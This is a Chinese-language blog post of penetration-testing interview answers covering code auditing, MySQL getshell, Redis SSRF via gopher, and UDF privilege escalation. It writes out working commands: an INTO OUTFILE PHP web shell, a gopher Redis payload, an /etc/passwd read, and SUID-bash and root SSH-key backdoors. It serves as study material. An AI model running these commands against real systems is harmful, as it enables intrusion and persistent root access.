当前位置：首页 > web >正文

2025年渗透测试面试题总结-31（题目+回答）

web 2025/8/25 5:54:06

安全领域各种资源，学习文档，以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具，欢迎关注。

一、代码审计核心思路（261）

二、MySQL Getshell前提（262）

三、mysql.ini 关键配置（263）

四、Redis SSRF攻击内网（264）

攻击流程：

常用协议及用途：

五、UDF提权详解（265）

原理流程：

实操步骤：

六、网络安全学习资源（266）

推荐矩阵：

二百六十一、代码审计的思路是什么二百六十二、mysql getshell的前提是什么二百六十三、其中需要mysql.ini 配置参数应该是怎样二百六十四、redis ssf 如何攻击内网，可以用到哪些协议二百六十五、说一下udf提权二百六十六、平常经常在哪些地方学习
一、代码审计核心思路（261）
mermaidgraph LR A[信息收集] --> B[静态分析] B --> C[动态验证] C --> D[漏洞利用] D --> E[报告输出]
四阶段审计法
入口定位：扫描用户输入点（GET/POST参数、文件上传、Cookie）
数据流追踪：跟踪外部输入在代码中的传播路径（如$_GET→SQL查询）
危险函数检测：
执行类：eval()/system()/exec()
文件类：file_put_contents()/move_uploaded_file()
反序列化：unserialize()

上下文验证：确认过滤机制有效性（如htmlspecialchars()位置是否正确）

二、MySQL Getshell前提（262）

需同时满足：

数据库权限
FILE权限：SELECT user,file_priv FROM mysql.user
可通过GRANT FILE ON *.* TO 'user'@'%'获取

路径条件
已知Web绝对路径（通过报错/配置文件泄露）
secure_file_priv非NULL状态（通过SHOW VARIABLES LIKE 'secure_file_priv'验证）

写入可行性
目标目录MySQL进程可写（Linux默认/tmp，WindowsC:\Windows\Temp）
非只读文件系统
📌 关键命令：
sqlSELECT '<?php system($_GET[cmd]);?>' INTO OUTFILE '/var/www/html/shell.php'; 
三、mysql.ini 关键配置（263）
ini# 允许文件导出（必须为空或指定目录） secure_file_priv = "" # 开启加载本地数据（非必须但推荐） local-infile = 1 # 设置插件目录（UDF提权需用） plugin_dir = /usr/lib/mysql/plugin/ # 配置项验证命令： SHOW VARIABLES LIKE 'secure_file_priv';
四、Redis SSRF攻击内网（264）

攻击流程：
mermaidsequenceDiagram Attacker->>+Vulnerable_Server： SSRF请求 Vulnerable_Server->>+Redis： Gopher协议指令 Redis-->>-Vulnerable_Server： 返回响应 Vulnerable_Server-->>-Attacker： 回显结果 
常用协议及用途：

协议 攻击场景 Payload示例
Gopher 发送任意Redis命令 gopher://127.0.0.1:6379/_*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0ax%0d%0a$10%0d%0aevilcommand%0d%0a
Dict 端口扫描/服务探测 dict://192.168.1.1:80/info
HTTP 穿透WAF攻击内网Web应用封装Redis命令为HTTP POST
File 读取服务器敏感文件 file:///etc/passwd

五、UDF提权详解（265）

原理流程：
mermaidgraph TB A[上传恶意.so/.dll] --> B[创建UDF函数] B --> C[调用函数执行命令] C --> D[获取系统权限]
实操步骤：
环境检测
确认MySQL版本：SELECT @@version
获取插件路径：SHOW VARIABLES LIKE 'plugin_dir'

上传共享库
利用SELECT ... INTO DUMPFILE写入udf.so （需16进制转换）
函数创建
sqlCREATE FUNCTION sys_exec RETURNS INTEGER SONAME 'udf.so'; SELECT sys_exec('chmod 4755 /usr/bin/bash');
权限维持
添加SSH密钥：echo pub_key >> /root/.ssh/authorized_keys
创建SUID后门：chown root:root /bin/bash; chmod 4777 /bin/bash
六、网络安全学习资源（266）

推荐矩阵：

类型 推荐平台 核心价值
漏洞实验室 Hack The Box、TryHackMe 真实渗透环境实战
技术社区 Reddit r/netsec、先知社区前沿漏洞分析/工具分享
视频课程 PentesterLab、OffensiveSec 手把手教学（含CVE复现）
博客追踪 PortSwigger、Project Zero 深度技术解析（如0day分析）
CTF平台 CTFtime、攻防世界竞赛驱动技能提升
漏洞库 Exploit-DB、CVE Details 最新漏洞PoC/影响分析
代码仓库 GitHub（关键词：CVE/PoC）开源工具链（如sqlmap源码研究）

协议	攻击场景	Payload示例
Gopher	发送任意Redis命令	`gopher://127.0.0.1:6379/_*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0ax%0d%0a$10%0d%0aevilcommand%0d%0a`
Dict	端口扫描/服务探测	`dict://192.168.1.1:80/info`
HTTP	穿透WAF攻击内网Web应用	封装Redis命令为HTTP POST
File	读取服务器敏感文件	`file:///etc/passwd`

类型	推荐平台	核心价值
漏洞实验室	Hack The Box、TryHackMe	真实渗透环境实战
技术社区	Reddit r/netsec、先知社区	前沿漏洞分析/工具分享
视频课程	PentesterLab、OffensiveSec	手把手教学（含CVE复现）
博客追踪	PortSwigger、Project Zero	深度技术解析（如0day分析）
CTF平台	CTFtime、攻防世界	竞赛驱动技能提升
漏洞库	Exploit-DB、CVE Details	最新漏洞PoC/影响分析
代码仓库	GitHub（关键词：CVE/PoC）	开源工具链（如sqlmap源码研究）